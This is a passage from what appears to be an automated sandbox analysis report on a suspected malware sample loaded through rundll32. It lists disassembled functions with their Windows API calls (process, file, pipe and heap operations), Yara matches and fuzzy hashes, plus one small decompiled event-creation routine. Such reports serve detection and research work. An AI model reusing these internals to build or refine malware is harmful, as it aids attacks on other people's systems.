                                              • Part of subcall function 0581D818: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D872
                                              • Part of subcall function 0581D818: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C,00000000,00000000,?,?,?,0580E219,?), ref: 0581D890
                                              • Part of subcall function 0581D818: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0581D8F8
                                            • GlobalUnWire.KERNEL32(00000000), ref: 0580F260
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                                            • String ID:
                                            • API String ID: 3286078456-0
                                            • Opcode ID: f19752ef942a959d1e47bb9dd67e843d67d2777cda21bc3491591e7598da3c10
                                            • Instruction ID: cf0b4f62f10c29337ed27458279d0d885711168ec4e4d07266bc48660e177bf6
                                            • Opcode Fuzzy Hash: f19752ef942a959d1e47bb9dd67e843d67d2777cda21bc3491591e7598da3c10
                                            • Instruction Fuzzy Hash: 16115175914304ABDB21ABA4AC4ABAE7FBCAF58B11F008015FE02E2180EF709905CF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05819649 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,05805F93,00000000,00000000), ref: 05819667
                                            • GetLastError.KERNEL32(?,?,?,05805F93,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,05802605,?,0000001E), ref: 0581966F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 203985260-0
                                            • Opcode ID: 45bad65408039eb5dee22e6c72b02adbfbefe505c634716ddb6cd348f86fc5d8
                                            • Instruction ID: 9590779e64b0b0b67bb4ff01c260c873def7ab3cf9b9e292cab025c1ecd5ae83
                                            • Opcode Fuzzy Hash: 45bad65408039eb5dee22e6c72b02adbfbefe505c634716ddb6cd348f86fc5d8
                                            • Instruction Fuzzy Hash: 630171762082557F8631AA269C5CC2BBE6DFBCA760F114A19FC66D6280DA209C04C77A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580292E Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?), ref: 05802942
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • mbstowcs.NTDLL ref: 0580295C
                                            • lstrlen.KERNEL32(?), ref: 05802967
                                            • mbstowcs.NTDLL ref: 05802981
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,00000000,76C869A0,?,00000250,?,00000000), ref: 05805A60
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?,?,00000000), ref: 05805A6C
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805AB4
                                              • Part of subcall function 05805A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05805ACF
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(0000002C), ref: 05805B07
                                              • Part of subcall function 05805A14: lstrlenW.KERNEL32(?), ref: 05805B0F
                                              • Part of subcall function 05805A14: memset.NTDLL ref: 05805B32
                                              • Part of subcall function 05805A14: wcscpy.NTDLL ref: 05805B44
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                                            • String ID:
                                            • API String ID: 1961997177-0
                                            • Opcode ID: f85aae5500cee9f3b45c74bf2e85faefb4299ce1b33c8dea08508254a259ebe6
                                            • Instruction ID: eced7e4b2c146cae6b515b950fb6d305050557d9d2f4d3bbc7964aebc1e8cfeb
                                            • Opcode Fuzzy Hash: f85aae5500cee9f3b45c74bf2e85faefb4299ce1b33c8dea08508254a259ebe6
                                            • Instruction Fuzzy Hash: 70019236600304B7CF216BA98C49F8F7EADEB84750F10A026BE05E7180EA75DD0097A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058100A6 Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,05820641,?,00000000,00000000), ref: 058100B9
                                            • lstrlen.KERNEL32(05D7C178,?,05820641,?,00000000,00000000), ref: 058100DA
                                            • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 058100F2
                                            • lstrcpy.KERNEL32(00000000,05D7C178), ref: 05810104
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 1929783139-0
                                            • Opcode ID: 7c4a1532c707f8d46a6c9fb49afa80e1e64c967d43cf11d006cd67b03033073d
                                            • Instruction ID: 0451524ba56efe417b36f75bc1a210119edd253ccd36cb0d896c6cb25a5db243
                                            • Opcode Fuzzy Hash: 7c4a1532c707f8d46a6c9fb49afa80e1e64c967d43cf11d006cd67b03033073d
                                            • Instruction Fuzzy Hash: 6601DB76904208FBC7219BACAC8DE9F7FBCAB88201F048065FD0AE3241DE349985C775
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580121A Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?), ref: 05801227
                                            • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 0580124D
                                            • lstrcpy.KERNEL32(00000014,?), ref: 05801272
                                            • memcpy.NTDLL(?,?,?), ref: 0580127F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeaplstrcpylstrlenmemcpy
                                            • String ID:
                                            • API String ID: 1388643974-0
                                            • Opcode ID: 6212f676a3d284bf843f5c31f313408e982ca963a44f87b1c46eb4fb9e3de75a
                                            • Instruction ID: 159c0ac69895e023ac9abcf27a8e91236901daed62a8961a151cf8228a2178f8
                                            • Opcode Fuzzy Hash: 6212f676a3d284bf843f5c31f313408e982ca963a44f87b1c46eb4fb9e3de75a
                                            • Instruction Fuzzy Hash: 8511497191020AEFCB21CF58D884A9ABFF8FB48714F10841AFC4AC7220C771E954CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05809706 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,058022AF,00000000,?,?,?), ref: 0580970D
                                            • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05809725
                                            • memcpy.NTDLL(0000000C,?,00000001), ref: 0580973B
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,765BD3B0,05D7C304,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 058152E8
                                              • Part of subcall function 058152C3: StrTrimA.SHLWAPI(?,05824FC4,00000000,?,0580CE0C,?,00000020,05D7C304), ref: 05815307
                                              • Part of subcall function 058152C3: StrChrA.SHLWAPI(?,?,?,0580CE0C,?,00000020,05D7C304), ref: 05815313
                                            • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 0580976D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                            • String ID:
                                            • API String ID: 3208927540-0
                                            • Opcode ID: 2b379fdbe0c2beeea030334452eb6a8200a363c5e0db25f9fc8120d7f251f355
                                            • Instruction ID: 9e3f5ffd5621f93d030ceda62f64aeb228ae4b20e9fb9a5721b8da34a03b8010
                                            • Opcode Fuzzy Hash: 2b379fdbe0c2beeea030334452eb6a8200a363c5e0db25f9fc8120d7f251f355
                                            • Instruction Fuzzy Hash: B601D433305309ABE7715E25AC89F77BEA8EB80711F008425FE4BD6192CB60AC498765
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05811777 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • RtlInitializeCriticalSection.NTDLL(05829420), ref: 0581179B
                                            • RtlInitializeCriticalSection.NTDLL(05829400), ref: 058117B1
                                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117C2
                                            • GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117F6
                                              • Part of subcall function 0581C203: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,058117D9), ref: 0581C21B
                                              • Part of subcall function 0581C203: LoadLibraryA.KERNEL32(?), ref: 0581C2BC
                                              • Part of subcall function 0581C203: FreeLibrary.KERNEL32(00000000), ref: 0581C2C7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                            • String ID:
                                            • API String ID: 1711133254-0
                                            • Opcode ID: 04cd59a284c8691edabdf2cc7ce828d3ccdacc2caa1c95f5b023cf54437ebc61
                                            • Instruction ID: fd471b53b0f28c7f7c6f94b52729ff9112b751768926db8946f7808093e20eb5
                                            • Opcode Fuzzy Hash: 04cd59a284c8691edabdf2cc7ce828d3ccdacc2caa1c95f5b023cf54437ebc61
                                            • Instruction Fuzzy Hash: 10112A71A202109FDB60AFAAA88E9453FE8F748625F00C42AFE09C7240DF756CC4CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05803383 Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0580338E
                                            • Sleep.KERNEL32(0000000A), ref: 05803398
                                            • SetEvent.KERNEL32 ref: 058033EF
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 0580340E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterEventLeaveSleep
                                            • String ID:
                                            • API String ID: 1925615494-0
                                            • Opcode ID: 7950c788a4c1b95aa7b7e1ad4c36352e4985db5f648a270c885d2bcdd290c7f9
                                            • Instruction ID: e5b6811d68d226fdb54700506620e867b88e2f3f43614b3f06c3ae753fec7168
                                            • Opcode Fuzzy Hash: 7950c788a4c1b95aa7b7e1ad4c36352e4985db5f648a270c885d2bcdd290c7f9
                                            • Instruction Fuzzy Hash: 7C018070654304EBDBA0ABA5AC4BF593FA8FB05700F009411FE05D61C0DF74AD84CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580FAA8 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05807C54: lstrlen.KERNEL32(?,?,00000000,0580FABE), ref: 05807C59
                                              • Part of subcall function 05807C54: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05807C6E
                                              • Part of subcall function 05807C54: wsprintfA.USER32 ref: 05807C8A
                                              • Part of subcall function 05807C54: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05807CA6
                                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0580FAD6
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0580FAE5
                                            • CloseHandle.KERNEL32(00000000), ref: 0580FAEF
                                            • GetLastError.KERNEL32 ref: 0580FAF7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                            • String ID:
                                            • API String ID: 4042893638-0
                                            • Opcode ID: c6790e2a987ecf14b9ea332c57432090750dbd078f2b364492e8bb35fed509e0
                                            • Instruction ID: 35726106184282f8bfa5e0a3cc2b0f3441235366dabf32aac645a1521628f9c2
                                            • Opcode Fuzzy Hash: c6790e2a987ecf14b9ea332c57432090750dbd078f2b364492e8bb35fed509e0
                                            • Instruction Fuzzy Hash: CCF0D632304214BBD7B0AB69EC4DF5B7F5DFB41660F10D115FE0AD50D0CA7059848AB6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581FE03 Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrcatW.KERNEL32(?,?), ref: 0581FE15
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0581FA24,?,?,00001000,?,?,00001000), ref: 0581FE38
                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0581FA24,?,?,00001000,?,?,00001000), ref: 0581FE5A
                                            • GetLastError.KERNEL32(?,0581FA24,?,?,00001000,?,?,00001000), ref: 0581FE6E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                            • String ID:
                                            • API String ID: 3370347312-0
                                            • Opcode ID: de83e9514ab8b7902e391c829ad18cb1970041457fe0f44f9da54b8886370fdb
                                            • Instruction ID: 967f4cae953edb7d5da42af6526f7ef50b007699d0ac5896b003ae82cc4443e6
                                            • Opcode Fuzzy Hash: de83e9514ab8b7902e391c829ad18cb1970041457fe0f44f9da54b8886370fdb
                                            • Instruction Fuzzy Hash: 85F08C32244204BBDB615F609C0AF9E3E2AAF15750F108514FF42E80E1DB7169618BBE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580E084 Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InterlockedExchange.KERNEL32(05829080,00000000), ref: 0580E090
                                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0580E0AB
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0580E0D4
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0580E0F5
                                              • Part of subcall function 0580608A: SetEvent.KERNEL32(?,?,0581F846), ref: 0580609F
                                              • Part of subcall function 0580608A: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0581F846), ref: 058060BF
                                              • Part of subcall function 0580608A: CloseHandle.KERNEL32(00000000,?,0581F846), ref: 058060C8
                                              • Part of subcall function 0580608A: CloseHandle.KERNEL32(00000000,?,?,0581F846), ref: 058060D2
                                              • Part of subcall function 0580608A: RtlEnterCriticalSection.NTDLL(?), ref: 058060DA
                                              • Part of subcall function 0580608A: RtlLeaveCriticalSection.NTDLL(?), ref: 058060F2
                                              • Part of subcall function 0580608A: CloseHandle.KERNEL32(?), ref: 0580610E
                                              • Part of subcall function 0580608A: LocalFree.KERNEL32(?), ref: 05806119
                                              • Part of subcall function 0580608A: RtlDeleteCriticalSection.NTDLL(?), ref: 05806123
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                            • String ID:
                                            • API String ID: 1103286547-0
                                            • Opcode ID: b119fd32fec90151c396165a56f794a95ac06c0e9a619c75e81feb9c6027c6fb
                                            • Instruction ID: ea66403b00fe827aa288a43628c2a8a80fcfac8fdcd7cc4562cddc02aea81811
                                            • Opcode Fuzzy Hash: b119fd32fec90151c396165a56f794a95ac06c0e9a619c75e81feb9c6027c6fb
                                            • Instruction Fuzzy Hash: C0F0AF3236022077DA701A65AC0EF873E6DFB90B21F054420FE06E62D0CD65AC85CB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F24BC Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E049F24BC(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                            0x049f24c6
                                            0x049f24ca
                                            0x049f24df
                                            0x049f24e1
                                            0x049f24e6
                                            0x049f24ec
                                            0x049f24ee
                                            0x049f24f3
                                            0x049f24fe
                                            0x049f24f5
                                            0x049f24f5
                                            0x049f24f5
                                            0x049f24f3
                                            0x049f250c

                                            APIs
                                            • memset.NTDLL ref: 049F24CA
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76CC81D0), ref: 049F24DF
                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 049F24EC
                                            • CloseHandle.KERNEL32(?), ref: 049F24FE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: CreateEvent$CloseHandlememset
                                            • String ID:
                                            • API String ID: 2812548120-0
                                            • Opcode ID: 120faf149b0859d33fbd8c5caa17e8d3db0e07a1f0e7cac458a0fd74752d2e38
                                            • Instruction ID: 6a515f4045df7f8ca0b420afc767fc864d6a4c42d3c691a433bb56c7c7d7973b
                                            • Opcode Fuzzy Hash: 120faf149b0859d33fbd8c5caa17e8d3db0e07a1f0e7cac458a0fd74752d2e38
                                            • Instruction Fuzzy Hash: 06F05EF110470C7FD314AF26DCC4D27BBACEB862ACB11497EF64682501D676BC098B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05816471 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0581647F
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0581A696,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05816494
                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0580D3E9,?,?), ref: 058164A1
                                            • CloseHandle.KERNEL32(?,?,?,?,0580D3E9,?,?), ref: 058164B3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateEvent$CloseHandlememset
                                            • String ID:
                                            • API String ID: 2812548120-0
                                            • Opcode ID: d1616b3a81c2b4c197b1ed90aaf062a6ded45a847d543e8a5434995368578074
                                            • Instruction ID: 972a7a351477acdb0279055d1501b3261195f5f143a685f133905ef1997d797b
                                            • Opcode Fuzzy Hash: d1616b3a81c2b4c197b1ed90aaf062a6ded45a847d543e8a5434995368578074
                                            • Instruction Fuzzy Hash: 7BF03AB510470C6FD220AF26DC84C27BBACEB86198B15892EF98382511DA75AC048BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05805EAE Relevance: 6.0, APIs: 4, Instructions: 40memorythreadtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • HeapFree.KERNEL32(00000000,?), ref: 05805EDF
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05805EF2
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05805F03
                                            • _aulldiv.NTDLL(?,?,00002710,00000000), ref: 05805F16
                                              • Part of subcall function 0581A952: lstrlen.KERNEL32(0580B047,00000000,00000000,00000000,?,0582090A,?,0580B047,00000000), ref: 0581A968
                                              • Part of subcall function 0581A952: lstrlen.KERNEL32(?,?,0582090A,?,0580B047,00000000), ref: 0581A96F
                                              • Part of subcall function 0581A952: RtlAllocateHeap.NTDLL(00000000,00000029), ref: 0581A97D
                                              • Part of subcall function 0581A952: wsprintfA.USER32 ref: 0581A99F
                                              • Part of subcall function 0581A952: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0581A9D0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$FreeTimelstrlen$AllocateExitFileSystemThreadUser_aulldivwsprintf
                                            • String ID:
                                            • API String ID: 157450322-0
                                            • Opcode ID: dae6bb86a5164db9fde7631e308947efb00d708da8ea57803d8834da3bd02cc2
                                            • Instruction ID: a136fb48da9121cf5ecc3bb0f7065f8043ae0e6a77ae1564be475cb1c4f32398
                                            • Opcode Fuzzy Hash: dae6bb86a5164db9fde7631e308947efb00d708da8ea57803d8834da3bd02cc2
                                            • Instruction Fuzzy Hash: D2F06936510204BFDB215BAADC4EF8A7FACEB45720F004465FA5AD21A0CB75AC85CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580709B Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,05819299,000000FF,05D7B7F0,?,?,0581BB0E,0000003A,05D7B7F0), ref: 058070B7
                                            • GetLastError.KERNEL32(?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000,?), ref: 058070C2
                                            • WaitNamedPipeA.KERNEL32(00002710), ref: 058070E4
                                            • WaitForSingleObject.KERNEL32(00000000,?,?,0581BB0E,0000003A,05D7B7F0,?,?,?,05806B9D,00000001,00000000,?), ref: 058070F2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                            • String ID:
                                            • API String ID: 4211439915-0
                                            • Opcode ID: 8caf6eed8d79a2ff26cc7affcef65b83961eb012404546a9f2c3f6edbf97d3bf
                                            • Instruction ID: 30aaf83db8cbd3aa53fc0ebf0f440bf3d11ac9f7b5a9482aa57f96b5ee935d80
                                            • Opcode Fuzzy Hash: 8caf6eed8d79a2ff26cc7affcef65b83961eb012404546a9f2c3f6edbf97d3bf
                                            • Instruction Fuzzy Hash: 0EF09632605120ABD7716666AC8EF977F15FB01371F12C161FD1AE61E0DA713C91C6A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05807C54 Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?,?,00000000,0580FABE), ref: 05807C59
                                            • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05807C6E
                                            • wsprintfA.USER32 ref: 05807C8A
                                              • Part of subcall function 0580B968: memset.NTDLL ref: 0580B97D
                                              • Part of subcall function 0580B968: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0580B9B6
                                              • Part of subcall function 0580B968: wcstombs.NTDLL ref: 0580B9C0
                                              • Part of subcall function 0580B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0580B9F1
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA1D
                                              • Part of subcall function 0580B968: TerminateProcess.KERNEL32(?,000003E5), ref: 0580BA33
                                              • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA47
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7A
                                              • Part of subcall function 0580B968: CloseHandle.KERNEL32(?), ref: 0580BA7F
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05807CA6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                            • String ID:
                                            • API String ID: 1624158581-0
                                            • Opcode ID: 5e02e0a289c188fd032ff46695a3fa58bbc587e9a4cde3b89a4026e541f53a53
                                            • Instruction ID: e746bb0b852a495bad3f42250c1d93e40fa69b609d23cd4828079ac56da30341
                                            • Opcode Fuzzy Hash: 5e02e0a289c188fd032ff46695a3fa58bbc587e9a4cde3b89a4026e541f53a53
                                            • Instruction Fuzzy Hash: 62F0B4326101147BDA701729BC0AFAB3E6DDBC1731F154111FD01D71E0DE20AC858675
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580CDBF Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0580CDC8
